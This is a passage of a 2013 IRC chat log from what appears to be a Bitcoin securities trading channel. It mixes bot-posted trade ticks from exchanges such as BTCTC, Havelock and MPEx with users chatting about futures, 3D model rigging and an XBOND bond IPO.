being based on math the people themselves needn't bother anymore. Aug 02 15:40:12 VanCleef vaguely. Aug 02 15:40:20 your site is the only place i see that format Aug 02 15:40:32 https://www.youtube.com/watch?v=MYyIhOsGtxM Aug 02 15:40:33 The vix futures had the same problem when they opened its hard to get liquidity into new products Aug 02 15:40:34 X-Trader Demo VS X-Trader Real - YouTube Aug 02 15:40:46 i use to that style Aug 02 15:41:03 matuszed especially in immature markets. not that many people that understand finance in btc yet. Aug 02 15:41:13 VanCleef :p Aug 02 15:41:14 trading off ticks Aug 02 15:41:28 [BTCTC] [LABCOIN] 152 @ 0.002137 = 0.3248 BTC [+] Aug 02 15:41:30 [BTCTC] [LABCOIN] 216 @ 0.002138 = 0.4618 BTC [+] Aug 02 15:41:31 [BTCTC] [LABCOIN] 20 @ 0.002138 = 0.0428 BTC [+] Aug 02 15:41:37 it's more because xtrade sticks close to sense than any other reason. Aug 02 15:42:35 i like how your orderbook is the same on teh site Aug 02 15:43:55 of course miners don't understand futures contacts, but neither do farmers Aug 02 15:44:03 [BTCTC] [LABCOIN] 1500 @ 0.002138 = 3.207 BTC [+] Aug 02 15:44:10 this is true. Aug 02 15:44:25 [BTCTC] [LABCOIN] 42 @ 0.002138 = 0.0898 BTC [+] Aug 02 15:44:31 heh so you've already been doing this for a while? Aug 02 15:44:36 [BTCTC] [LABCOIN] 250 @ 0.002138 = 0.5345 BTC [+] Aug 02 15:44:42 http://trilema.com/2012/further-futures-on-mpex/ Aug 02 15:44:45 Further futures on MPEx pe Trilema - Un blog de Mircea Popescu. Aug 02 15:44:49 [BTCTC] [LABCOIN] 100 @ 0.002138 = 0.2138 BTC [+] Aug 02 15:45:38 VanCleef yes. Aug 02 15:45:48 as a rule of thumb, i've been doing all the good ideas for a while. Aug 02 15:46:01 just, slow as molasses to get going because "the community" is investing in gembears. Aug 02 15:46:09 nice, yeah i think i seen something similar on bf as well Aug 02 15:47:43 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 02 15:50:00 [BTCTC] [S.MPOE-PT] 404 @ 0.00086 = 0.3474 BTC [-] Aug 02 15:51:11 mircea_popescu: is chett on it? Aug 02 15:51:15 IT* Aug 02 15:51:44 yes Aug 02 15:52:34 are there any in game actions now that would trigger animation? Aug 02 15:52:40 or should I ask him that? Aug 02 15:53:12 her. chett's martha mcculler's nom de guerre. Aug 02 15:53:21 and you can move around, jump and whatnot. Aug 02 15:53:41 you want a sample rigged model to get an idea wtf needs to be in there, is that it ? Aug 02 15:54:51 no I'm just wondering how if rigging is attached yet, cause rigging models would be moot if not Aug 02 15:57:14 it is. Aug 02 15:57:46 anyway, there will be a sample model up for ppl to be able to intuitively see what a model needs. Aug 02 15:58:55 [HAVELOCK] [SMG] 91 @ 0.00025 = 0.0228 BTC [-] Aug 02 15:59:44 [HAVELOCK] [LABCO] 16 @ 0.0025 = 0.04 BTC [+] Aug 02 16:00:46 [HAVELOCK] [SMG] 4 @ 0.00026599 = 0.0011 BTC [+] Aug 02 16:02:27 hmm. like what a cal3d file? or something someone could open in max? Aug 02 16:03:00 i think a blender file ? Aug 02 16:03:17 dunno yet, because i can have people either work or explain things to me. Aug 02 16:03:22 and for now im opting to let ppl work Aug 02 16:04:10 [BTCTC] [LABCOIN] 192 @ 0.002139 = 0.4107 BTC [+] Aug 02 16:05:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.04147 = 0.0829 BTC [-] Aug 02 16:07:06 [BTCTC] [LABCOIN] 97 @ 0.002139 = 0.2075 BTC [+] Aug 02 16:07:20 [BTCTC] [DMS.PURCHASE] 48 @ 0.03353 = 1.6094 BTC [+] Aug 02 16:07:35 [BTCTC] [LABCOIN] 111 @ 0.002139 = 0.2374 BTC [+] Aug 02 16:08:01 blender files are pretty standard, no need explaining Aug 02 16:08:14 [BTCTC] [LABCOIN] 1152 @ 0.00214 = 2.4653 BTC [+] Aug 02 16:08:15 [BTCTC] [LABCOIN] 141 @ 0.002143 = 0.3022 BTC [+] Aug 02 16:08:16 [BTCTC] [LABCOIN] 848 @ 0.002144 = 1.8181 BTC [+] Aug 02 16:08:17 [BTCTC] [LABCOIN] 3 @ 0.002146 = 0.0064 BTC [+] Aug 02 16:08:19 [BTCTC] [LABCOIN] 20 @ 0.002147 = 0.0429 BTC [+] Aug 02 16:08:20 [BTCTC] [LABCOIN] 166 @ 0.002149 = 0.3567 BTC [+] Aug 02 16:08:21 [BTCTC] [LABCOIN] 1000 @ 0.00215 = 2.15 BTC [+] Aug 02 16:08:21 [BTCTC] [LABCOIN] 276 @ 0.002166 = 0.5978 BTC [+] Aug 02 16:08:22 [BTCTC] [LABCOIN] 1659 @ 0.002167 = 3.5951 BTC [+] Aug 02 16:08:23 [BTCTC] [LABCOIN] 166 @ 0.002179 = 0.3617 BTC [+] Aug 02 16:08:24 [BTCTC] [LABCOIN] 1000 @ 0.00218 = 2.18 BTC [+] Aug 02 16:08:25 [BTCTC] [LABCOIN] 5 @ 0.002191 = 0.011 BTC [+] Aug 02 16:08:26 [BTCTC] [LABCOIN] 30 @ 0.002192 = 0.0658 BTC [+] Aug 02 16:08:27 [BTCTC] [LABCOIN] 333 @ 0.002199 = 0.7323 BTC [+] Aug 02 16:08:27 Melt up Aug 02 16:08:28 [BTCTC] [LABCOIN] 2000 @ 0.0022 = 4.4 BTC [+] Aug 02 16:08:29 [BTCTC] [LABCOIN] 101 @ 0.0022 = 0.2222 BTC [+] Aug 02 16:09:39 [BTCTC] [LABCOIN] 144 @ 0.002199 = 0.3167 BTC [-] Aug 02 16:09:41 [BTCTC] [LABCOIN] 106 @ 0.002199 = 0.2331 BTC [-] Aug 02 16:09:50 [BTCTC] [DMS.SELLING] 52 @ 0.0243 = 1.2636 BTC [+] Aug 02 16:10:42 [BTCTC] [DMS.SELLING] 9 @ 0.0245 = 0.2205 BTC [+] Aug 02 16:10:43 [BTCTC] [DMS.SELLING] 43 @ 0.02488 = 1.0698 BTC [+] Aug 02 16:10:56 [BTCTC] [BTCGARDEN] 50000 @ 0.016 = 800 BTC [+] Aug 02 16:10:59 [BTCTC] [DMS.SELLING] 2 @ 0.02488 = 0.0498 BTC [+] Aug 02 16:11:26 ;;bc,stats Aug 02 16:11:35 [BTCTC] [ACTIVEMINING] 7 @ 0.006094 = 0.0427 BTC [+] Aug 02 16:11:36 [BTCTC] [ACTIVEMINING] 20 @ 0.006095 = 0.1219 BTC [+] Aug 02 16:11:38 [BTCTC] [ACTIVEMINING] 10 @ 0.006097 = 0.061 BTC [+] Aug 02 16:11:39 [BTCTC] [ACTIVEMINING] 783 @ 0.0061 = 4.7763 BTC [+] Aug 02 16:11:53 [BTCTC] [BTCGARDEN] 370 @ 0.016 = 5.92 BTC [+] Aug 02 16:13:06 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 02 16:13:45 [BTCTC] [BTCGARDEN] 324 @ 0.016 = 5.184 BTC [+] Aug 02 16:14:43 I am really curious as to whats going to happen with BG when it actually makes it past its wall, whenever that happens. Aug 02 16:15:30 [BTCTC] [PAJKA.BOND] 12 @ 0.0269 = 0.3228 BTC [-] Aug 02 16:15:47 rulother: me too! Aug 02 16:19:39 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [+] Aug 02 16:21:30 [HAVELOCK] [LABCO] 323 @ 0.0025 = 0.8075 BTC [+] Aug 02 16:21:35 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [-] Aug 02 16:21:36 [BTCTC] [BTCGARDEN] 134 @ 0.01599 = 2.1427 BTC [-] Aug 02 16:21:38 [BTCTC] [BTCGARDEN] 200 @ 0.01599 = 3.198 BTC [-] Aug 02 16:21:39 [BTCTC] [BTCGARDEN] 65 @ 0.01599 = 1.0394 BTC [-] Aug 02 16:21:44 someone gave up Aug 02 16:22:25 [BTCTC] [ACTIVEMINING] 38 @ 0.006142 = 0.2334 BTC [+] Aug 02 16:23:10 [BTCTC] [ACTIVEMINING] 25 @ 0.006141 = 0.1535 BTC [-] Aug 02 16:23:12 [BTCTC] [ACTIVEMINING] 56 @ 0.006142 = 0.344 BTC [+] Aug 02 16:24:04 [HAVELOCK] [LABCO] 10 @ 0.00289 = 0.0289 BTC [+] Aug 02 16:24:28 ugh Aug 02 16:24:42 The one time I want to be on havelock Aug 02 16:25:19 LABCO PT doesnt allow imports Aug 02 16:25:37 Yeah sadly Aug 02 16:25:52 [HAVELOCK] [LABCO] 20 @ 0.00289 = 0.0578 BTC [+] Aug 02 16:28:14 [BTCTC] [ACTIVEMINING] 25 @ 0.006131 = 0.1533 BTC [-] Aug 02 16:28:29 [BTCTC] [BTCGARDEN] 312 @ 0.01599 = 4.9889 BTC [-] Aug 02 16:28:43 [HAVELOCK] [AM100] 15 @ 0.039 = 0.585 BTC [+] Aug 02 16:28:48 [BTCTC] [LABCOIN] 1 @ 0.002039 BTC [-] Aug 02 16:29:12 [BTCTC] [LABCOIN] 19 @ 0.002039 = 0.0387 BTC [-] Aug 02 16:29:20 [BTCTC] [LABCOIN] 489 @ 0.002038 = 0.9966 BTC [-] Aug 02 16:29:21 [BTCTC] [LABCOIN] 81 @ 0.002037 = 0.165 BTC [-] Aug 02 16:30:15 [BTCTC] [BTCGARDEN] 370 @ 0.01599 = 5.9163 BTC [-] Aug 02 16:30:28 [BTCTC] [BTCGARDEN] 500 @ 0.01599 = 7.995 BTC [-] Aug 02 16:31:19 [BTCTC] [LABCOIN] 1000 @ 0.002012 = 2.012 BTC [-] Aug 02 16:31:19 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [-] Aug 02 16:31:29 [BTCTC] [BFMINES] 25 @ 0.003995 = 0.0999 BTC [+] Aug 02 16:32:40 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [-] Aug 02 16:32:52 [BTCTC] [TAT.ASICMINER] 9 @ 0.04143 = 0.3729 BTC [-] Aug 02 16:32:56 [MPEX] [S.MPOE] 9800 @ 0.00081914 = 8.0276 BTC [+] Aug 02 16:32:57 [MPEX] [S.MPOE] 2720 @ 0.00082111 = 2.2334 BTC [+] Aug 02 16:33:09 [BTCTC] [BTCGARDEN] 3463 @ 0.01599 = 55.3734 BTC [-] Aug 02 16:33:11 [BTCTC] [BTCGARDEN] 6537 @ 0.016 = 104.592 BTC [+] Aug 02 16:33:30 [BTCTC] [LABCOIN] 415 @ 0.002012 = 0.835 BTC [-] Aug 02 16:34:06 [HAVELOCK] [HIM] 2 @ 0.1619999 = 0.324 BTC [+] Aug 02 16:34:25 [BTCTC] [LABCOIN] 10 @ 0.00201 = 0.0201 BTC [-] Aug 02 16:34:26 [BTCTC] [LABCOIN] 480 @ 0.002001 = 0.9605 BTC [-] Aug 02 16:34:28 [BTCTC] [LABCOIN] 211 @ 0.002001 = 0.4222 BTC [-] Aug 02 16:34:29 [BTCTC] [LABCOIN] 648 @ 0.002 = 1.296 BTC [-] Aug 02 16:34:48 [BTCTC] [TAT.ASICMINER] 15 @ 0.04144 = 0.6216 BTC [+] Aug 02 16:35:16 [MPEX] [S.MPOE] 11500 @ 0.00081847 = 9.4124 BTC [-] Aug 02 16:35:19 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 02 16:39:57 [BTCTC] [BTCGARDEN] 125 @ 0.016 = 2 BTC [+] Aug 02 16:40:15 [BTCTC] [ACTIVEMINING] 25 @ 0.006124 = 0.1531 BTC [-] Aug 02 16:40:16 [BTCTC] [LABCOIN] 3 @ 0.002189 = 0.0066 BTC [+] Aug 02 16:40:34 [HAVELOCK] [LABCO] 10 @ 0.0029 = 0.029 BTC [+] Aug 02 16:40:37 [MPEX] [S.MPOE] 2375 @ 0.00082111 = 1.9501 BTC [+] Aug 02 16:40:37 [MPEX] [S.MPOE] 22575 @ 0.00082171 = 18.5501 BTC [+] Aug 02 16:40:44 [MPEX] [S.MPOE] 14850 @ 0.00082289 = 12.2199 BTC [+] Aug 02 16:43:32 [BTCTC] [GSDPT] 300 @ 0.0033 = 0.99 BTC [-] Aug 02 16:43:34 [BTCTC] [GSDPT] 199 @ 0.003182 = 0.6332 BTC [-] Aug 02 16:44:43 [BTCTC] [LABCOIN] 14 @ 0.002037 = 0.0285 BTC [-] Aug 02 16:44:44 [BTCTC] [LABCOIN] 40 @ 0.002036 = 0.0814 BTC [-] Aug 02 16:44:46 [BTCTC] [LABCOIN] 2 @ 0.00201 = 0.004 BTC [-] Aug 02 16:44:47 [BTCTC] [LABCOIN] 144 @ 0.002001 = 0.2881 BTC [-] Aug 02 16:45:44 [BTCTC] [GSDPT] 217 @ 0.003182 = 0.6905 BTC [-] Aug 02 16:45:47 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1951 BTC [-] Aug 02 16:46:21 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1951 = 0.3902 BTC [-] Aug 02 16:47:06 [BTCTC] [BASIC-MINING] 1 @ 0.4693 BTC [-] Aug 02 16:48:31 [BTCTC] [BASIC-MINING] 3 @ 0.4451 = 1.3353 BTC [-] Aug 02 16:48:32 [BTCTC] [BASIC-MINING] 1 @ 0.445 BTC [-] Aug 02 16:49:05 [BTCTC] [GSDPT] 10 @ 0.00349 = 0.0349 BTC [+] Aug 02 16:49:07 [BTCTC] [GSDPT] 17 @ 0.00349 = 0.0593 BTC [+] Aug 02 16:51:08 [BTCTC] [ACTIVEMINING] 34 @ 0.006124 = 0.2082 BTC [-] Aug 02 16:51:33 [BTCTC] [GSDPT] 584 @ 0.003182 = 1.8583 BTC [-] Aug 02 16:52:11 [BTCTC] [BTCGARDEN] 62 @ 0.016 = 0.992 BTC [+] Aug 02 16:52:19 [BTCTC] [GSDPT] 8 @ 0.003175 = 0.0254 BTC [-] Aug 02 16:52:21 [BTCTC] [GSDPT] 1 @ 0.002792 BTC [-] Aug 02 16:52:22 [BTCTC] [GSDPT] 498 @ 0.001001 = 0.4985 BTC [-] Aug 02 16:52:23 [BTCTC] [GSDPT] 1646 @ 0.001 = 1.646 BTC [-] Aug 02 16:52:30 [BTCTC] [LABCOIN] 892 @ 0.002001 = 1.7849 BTC [-] Aug 02 16:52:48 [BTCTC] [DMS.MINING] 1 @ 0.0098 BTC [+] Aug 02 16:52:58 [BTCTC] [LABCOIN] 528 @ 0.002001 = 1.0565 BTC [-] Aug 02 16:53:00 [BTCTC] [LABCOIN] 472 @ 0.002 = 0.944 BTC [-] Aug 02 16:53:34 [BTCTC] [GSDPT] 37 @ 0.001 = 0.037 BTC [-] Aug 02 16:53:41 [BTCTC] [GSDPT] 54 @ 0.001 = 0.054 BTC [-] Aug 02 16:54:07 [BTCTC] [BTCGARDEN] 125 @ 0.016 = 2 BTC [+] Aug 02 16:55:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.04139 BTC [-] Aug 02 16:55:13 [BTCTC] [BTCGARDEN] 140 @ 0.016 = 2.24 BTC [+] Aug 02 16:55:35 [BTCTC] [DMS.MINING] 19 @ 0.0098 = 0.1862 BTC [+] Aug 02 16:55:51 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 16:56:27 [BTCTC] [BTCGARDEN] 625 @ 0.016 = 10 BTC [+] Aug 02 16:56:35 [BTCTC] [S.MPOE-PT] 10 @ 0.0009397 = 0.0094 BTC [+] Aug 02 16:57:40 [BTCTC] [BTCGARDEN] 164 @ 0.016 = 2.624 BTC [+] Aug 02 16:58:26 [MPEX] [S.MPOE] 4200 @ 0.00082289 = 3.4561 BTC [+] Aug 02 16:59:25 [HAVELOCK] [HIM] 1 @ 0.16199999 BTC [+] Aug 02 16:59:28 [HAVELOCK] [HIM] 1 @ 0.162 BTC [+] Aug 02 16:59:57 [HAVELOCK] [HIM] 1 @ 0.163999 BTC [+] Aug 02 17:00:18 [BTCTC] [GSDPT] 100 @ 0.001001 = 0.1001 BTC [+] Aug 02 17:01:11 [BTCTC] [ASICMINER-PT] 2 @ 4.149 = 8.298 BTC [+] Aug 02 17:02:09 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 02 17:02:20 [BTCTC] [LABCOIN] 489 @ 0.002168 = 1.0602 BTC [+] Aug 02 17:02:21 [BTCTC] [LABCOIN] 500 @ 0.002169 = 1.0845 BTC [+] Aug 02 17:02:22 [BTCTC] [LABCOIN] 164 @ 0.002173 = 0.3564 BTC [+] Aug 02 17:02:23 [BTCTC] [LABCOIN] 20 @ 0.002177 = 0.0435 BTC [+] Aug 02 17:02:24 [BTCTC] [LABCOIN] 83 @ 0.002189 = 0.1817 BTC [+] Aug 02 17:02:25 [BTCTC] [LABCOIN] 500 @ 0.00219 = 1.095 BTC [+] Aug 02 17:02:26 [BTCTC] [LABCOIN] 944 @ 0.002194 = 2.0711 BTC [+] Aug 02 17:04:05 [HAVELOCK] [SDSTM] 271 @ 0.00762002 = 2.065 BTC [-] Aug 02 17:05:47 [BTCTC] [BTCGARDEN] 23200 @ 0.016 = 371.2 BTC [+] Aug 02 17:05:59 [BTCTC] [GSDPT] 100 @ 0.00101 = 0.101 BTC [+] Aug 02 17:06:49 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [+] Aug 02 17:07:52 [BTCTC] [GSDPT] 900 @ 0.00101 = 0.909 BTC [+] Aug 02 17:08:47 [BTCTC] [GSDPT] 7 @ 0.001 = 0.007 BTC [-] Aug 02 17:09:40 [BTCTC] [ASICMINER-PT] 1 @ 4.149 BTC [+] Aug 02 17:09:41 [BTCTC] [ASICMINER-PT] 5 @ 4.15 = 20.75 BTC [+] Aug 02 17:10:51 [BTCTC] [DMS.SELLING] 10 @ 0.02533 = 0.2533 BTC [+] Aug 02 17:12:03 [BTCTC] [DMS.PURCHASE] 1 @ 0.034 BTC [+] Aug 02 17:12:48 [BTCTC] [BTCGARDEN] 666 @ 0.016 = 10.656 BTC [+] Aug 02 17:12:53 [HAVELOCK] [LABCO] 10 @ 0.00237 = 0.0237 BTC [-] Aug 02 17:13:02 [HAVELOCK] [LABCO] 20 @ 0.0025 = 0.05 BTC [+] Aug 02 17:13:12 [HAVELOCK] [LABCO] 70 @ 0.0025 = 0.175 BTC [+] Aug 02 17:13:37 [HAVELOCK] [SDSTM] 1 @ 0.00762002 BTC [-] Aug 02 17:13:45 [HAVELOCK] [SDSTM] 32 @ 0.00759 = 0.2429 BTC [-] Aug 02 17:13:54 [HAVELOCK] [SDSTM] 1 @ 0.007555 BTC [-] Aug 02 17:14:05 [HAVELOCK] [SDSTM] 16 @ 0.00750001 = 0.12 BTC [-] Aug 02 17:14:23 [BTCTC] [BTCGARDEN] 50000 @ 0.016 = 800 BTC [+] Aug 02 17:15:13 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 02 17:15:40 http://bcoinnews.com/ Aug 02 17:15:43 Bitcoin news | Bitcoin news that actually matters. Aug 02 17:15:55 Havelock XBOND IPO Aug 02 17:16:09 sweet Aug 02 17:16:10 also, Aug 02 17:16:24 https://bitcointalk.org/index.php?topic=265287.0 Aug 02 17:16:27 no Aug 02 17:16:30 [IPO 8-2-13] [XBOND] Bitcoin's Only Exchangeable Bond Aug 02 17:16:37 http://www.reddit.com/r/BitcoinStocks/comments/1jj4qf/ipo_8213_xbond_bitcoins_only_exchangeable_bond/ Aug 02 17:16:41 [IPO 8-2-13] [XBOND] Bitcoin's Only Exchangeable Bond (also has an 18.25%APY) : BitcoinStocks Aug 02 17:17:12 [HAVELOCK] [AM100] 10 @ 0.03888881 = 0.3889 BTC [-] Aug 02 17:17:22 the next labcoin? x50 ipo profits? Aug 02 17:17:30 huh? Aug 02 17:17:39 xbond Aug 02 17:17:56 XBOND IS UP Aug 02 17:17:58 gogogogogo Aug 02 17:17:59 [BTCTC] [GSDPT] 3000 @ 0.00051 = 1.53 BTC [-] Aug 02 17:18:01 [BTCTC] [GSDPT] 5 @ 0.000502 = 0.0025 BTC [-] Aug 02 17:18:03 [BTCTC] [GSDPT] 2994 @ 0.000501 = 1.5 BTC [-] Aug 02 17:18:17 [BTCTC] [COGNITIVE] 1 @ 0.465 BTC [+] Aug 02 17:18:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002986 BTC [+] Aug 02 17:18:50 [BTCTC] [BASIC-MINING] 1 @ 0.4649 BTC [+] Aug 02 17:18:55 xbondcoins Aug 02 17:18:59 catch em all Aug 02 17:19:03 [BTCTC] [GSDPT] 94 @ 0.00101 = 0.0949 BTC [+] Aug 02 17:19:04 [BTCTC] [GSDPT] 50 @ 0.0007 = 0.035 BTC [-] Aug 02 17:19:05 [BTCTC] [GSDPT] 100 @ 0.0006 = 0.06 BTC [-] Aug 02 17:19:06 [BTCTC] [GSDPT] 3000 @ 0.00051 = 1.53 BTC [-] Aug 02 17:19:07 [BTCTC] [GSDPT] 1756 @ 0.000501 = 0.8798 BTC [-] Aug 02 17:19:08 when will xbond unlock? Aug 02 17:19:32 2013-08-02 13:00 Aug 02 17:19:40 Well Aug 02 17:19:44 hmmm Aug 02 17:19:47 [BTCTC] [GSDPT] 1 @ 0.0005011 BTC [+] Aug 02 17:19:48 [BTCTC] [GSDPT] 3440 @ 0.000501 = 1.7234 BTC [-] Aug 02 17:19:50 I guess from server time, in 3 hours Aug 02 17:19:51 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [+] Aug 02 17:20:03 I guess I'll throw some money at havelock Aug 02 17:20:11 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 17:20:26 [BTCTC] [GSDPT] 1000 @ 0.00051 = 0.51 BTC [+] Aug 02 17:20:29 [BTCTC] [BTCGARDEN] 1850 @ 0.016 = 29.6 BTC [+] Aug 02 17:20:31 2hrs 40m from now Aug 02 17:20:38 [HAVELOCK] [AM100] 40 @ 0.03888881 = 1.5556 BTC [-] Aug 02 17:20:42 [BTCTC] [BASIC-MINING] 1 @ 0.4649 BTC [+] Aug 02 17:20:57 [BTCTC] [ACTIVEMINING] 5 @ 0.005999 = 0.03 BTC [-] Aug 02 17:21:52 my plan: http://i.imgur.com/sOPbfjw.jpg Aug 02 17:22:16 sorry to the pople that got the xbond announcement twice :p i need mroe coffee Aug 02 17:22:21 *people Aug 02 17:22:25 *more Aug 02 17:22:27 jesus Aug 02 17:23:24 ;;calc .005 * 0.0035 Aug 02 17:23:24 1.75e-05 Aug 02 17:23:42 topace, you might just want to jump to the cocaine this morning. :) Aug 02 17:23:43 [BTCTC] [BASIC-MINING] 2 @ 0.432 = 0.864 BTC [-] Aug 02 17:23:44 [BTCTC] [BASIC-MINING] 1 @ 0.432 BTC [-] Aug 02 17:23:45 [BTCTC] [BASIC-MINING] 20 @ 0.4319 = 8.638 BTC [-] Aug 02 17:23:46 [BTCTC] [BASIC-MINING] 25 @ 0.4318 = 10.795 BTC [-] Aug 02 17:23:53 [HAVELOCK] [LABCO] 710 @ 0.0025 = 1.775 BTC [+] Aug 02 17:24:01 xbond only on Havelock not on btct, right? Aug 02 17:24:02 [HAVELOCK] [AM100] 9 @ 0.0388888 = 0.35 BTC [-] Aug 02 17:24:59 man its like my internal clock is set to TAT today Aug 02 17:25:19 [HAVELOCK] [HIM] 1 @ 0.135 BTC [-] Aug 02 17:25:29 rolled out of bed... walked to my computer and then DING email from HAVLOCK Aug 02 17:25:36 [HAVELOCK] [VTX] 1 @ 0.4521 BTC [-] Aug 02 17:25:39 [HAVELOCK] [AM100] 17 @ 0.0388888 = 0.6611 BTC [-] Aug 02 17:26:08 :) Aug 02 17:26:22 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [+] Aug 02 17:26:37 [10:23] xbond only on Havelock not on btct, right? <<< that is correct, we'll consider releasing on other exchanges later, if necessary Aug 02 17:27:35 [HAVELOCK] [AM100] 1 @ 0.03888881 BTC [+] Aug 02 17:27:38 [HAVELOCK] [AM100] 1 @ 0.0381 BTC [-] Aug 02 17:28:22 how good has havelock been during big volume IPOs? Aug 02 17:28:28 [HAVELOCK] [SMG] 9 @ 0.00024669 = 0.0022 BTC [-] Aug 02 17:28:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1996 BTC [+] Aug 02 17:28:32 [BTCTC] [GSDPT] 36 @ 0.00051 = 0.0184 BTC [+] Aug 02 17:28:50 [HAVELOCK] [AM100] 1 @ 0.0381 BTC [-] Aug 02 17:28:53 [HAVELOCK] [SDSTM] 1 @ 0.00750001 BTC [-] Aug 02 17:28:56 [BTCTC] [LABCOIN] 3 @ 0.002033 = 0.0061 BTC [-] Aug 02 17:28:57 [BTCTC] [LABCOIN] 20 @ 0.002032 = 0.0406 BTC [-] Aug 02 17:28:59 [BTCTC] [LABCOIN] 83 @ 0.002031 = 0.1686 BTC [-] Aug 02 17:28:59 [BTCTC] [LABCOIN] 500 @ 0.00203 = 1.015 BTC [-] Aug 02 17:29:00 [BTCTC] [LABCOIN] 13 @ 0.002005 = 0.0261 BTC [-] Aug 02 17:29:01 [BTCTC] [LABCOIN] 80 @ 0.002004 = 0.1603 BTC [-] Aug 02 17:29:02 [BTCTC] [LABCOIN] 1092 @ 0.002002 = 2.1862 BTC [-] Aug 02 17:29:03 [BTCTC] [LABCOIN] 300 @ 0.002001 = 0.6003 BTC [-] Aug 02 17:29:05 [BTCTC] [LABCOIN] 1909 @ 0.002 = 3.818 BTC [-] Aug 02 17:29:32 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 02 17:29:57 [BTCTC] [LABCOIN] 600 @ 0.00209 = 1.254 BTC [+] Aug 02 17:30:00 [BTCTC] [BTCGARDEN] 7700 @ 0.016 = 123.2 BTC [+] Aug 02 17:30:05 [HAVELOCK] [SMG] 10 @ 0.00024 = 0.0024 BTC [-] Aug 02 17:30:18 [BTCTC] [DMS.MINING] 21 @ 0.009998 = 0.21 BTC [+] Aug 02 17:30:18 [BTCTC] [DMS.MINING] 24 @ 0.0101 = 0.2424 BTC [+] Aug 02 17:30:19 [BTCTC] [DMS.MINING] 116 @ 0.0102 = 1.1832 BTC [+] Aug 02 17:30:20 [BTCTC] [DMS.MINING] 69 @ 0.0111 = 0.7659 BTC [+] Aug 02 17:30:21 [BTCTC] [DMS.MINING] 50 @ 0.01178 = 0.589 BTC [+] Aug 02 17:30:22 [BTCTC] [DMS.MINING] 220 @ 0.0118 = 2.596 BTC [+] Aug 02 17:30:23 [BTCTC] [DMS.MINING] 50 @ 0.01195 = 0.5975 BTC [+] Aug 02 17:30:24 [BTCTC] [DMS.MINING] 116 @ 0.01199 = 1.3908 BTC [+] Aug 02 17:30:25 [BTCTC] [DMS.MINING] 27 @ 0.012 = 0.324 BTC [+] Aug 02 17:30:26 [BTCTC] [DMS.MINING] 223 @ 0.012 = 2.676 BTC [+] Aug 02 17:30:27 [BTCTC] [DMS.MINING] 284 @ 0.012 = 3.408 BTC [+] Aug 02 17:30:28 [HAVELOCK] [SDSTM] 68 @ 0.00750001 = 0.51 BTC [-] Aug 02 17:30:29 [HAVELOCK] [SMG] 60 @ 0.00024 = 0.0144 BTC [-] Aug 02 17:30:31 [HAVELOCK] [LABCO] 20 @ 0.00236 = 0.0472 BTC [-] Aug 02 17:30:33 [HAVELOCK] [LABCO] 162 @ 0.00235 = 0.3807 BTC [-] Aug 02 17:30:35 [HAVELOCK] [LABCO] 5 @ 0.00225651 = 0.0113 BTC [-] Aug 02 17:30:37 [HAVELOCK] [LABCO] 413 @ 0.00221 = 0.9127 BTC [-] Aug 02 17:30:47 hey TAT, do you have any other funds on havelock atm? Aug 02 17:30:59 Yes Aug 02 17:31:05 I run AM1, AM100, and SMG Aug 02 17:31:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.04136 = 0.1654 BTC [-] Aug 02 17:31:15 oh yeah i saw that Aug 02 17:31:20 [HAVELOCK] [AM100] 2 @ 0.0381 = 0.0762 BTC [-] Aug 02 17:31:25 those are all PTs though Aug 02 17:31:28 [BTCTC] [DMS.MINING] 230 @ 0.012 = 2.76 BTC [+] Aug 02 17:31:54 [BTCTC] [LABCOIN] 65 @ 0.002089 = 0.1358 BTC [-] Aug 02 17:32:31 no "-TAT" on the names so my sleepy brain said no Aug 02 17:32:39 [BTCTC] [DMS.SELLING] 12 @ 0.0245 = 0.294 BTC [-] Aug 02 17:32:44 [BTCTC] [DMS.MINING] 98 @ 0.01206 = 1.1819 BTC [+] Aug 02 17:32:45 [BTCTC] [DMS.MINING] 40 @ 0.01229 = 0.4916 BTC [+] Aug 02 17:32:46 [BTCTC] [DMS.MINING] 130 @ 0.0125 = 1.625 BTC [+] Aug 02 17:32:47 [BTCTC] [DMS.MINING] 1218 @ 0.013 = 15.834 BTC [+] Aug 02 17:33:28 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 02 17:33:29 [BTCTC] [LABCOIN] 1191 @ 0.002001 = 2.3832 BTC [-] Aug 02 17:33:31 [BTCTC] [LABCOIN] 1402 @ 0.002 = 2.804 BTC [-] Aug 02 17:33:38 Havelock doesnt allow tagging like that Aug 02 17:33:40 yet Aug 02 17:33:54 [BTCTC] [LABCOIN] 4 @ 0.002088 = 0.0084 BTC [+] Aug 02 17:34:30 [BTCTC] [BTCGARDEN] 1920 @ 0.016 = 30.72 BTC [+] Aug 02 17:35:47 [BTCTC] [GSDPT] 8 @ 0.000502 = 0.004 BTC [-] Aug 02 17:36:30 [BTCTC] [BTCGARDEN] 311 @ 0.016 = 4.976 BTC [+] Aug 02 17:36:37 [HAVELOCK] [AM100] 2 @ 0.0381 = 0.0762 BTC [-] Aug 02 17:36:40 [MPEX] [S.MPOE] 18300 @ 0.00082289 = 15.0589 BTC [+] Aug 02 17:36:54 [HAVELOCK] [AM100] 2 @ 0.038 = 0.076 BTC [-] Aug 02 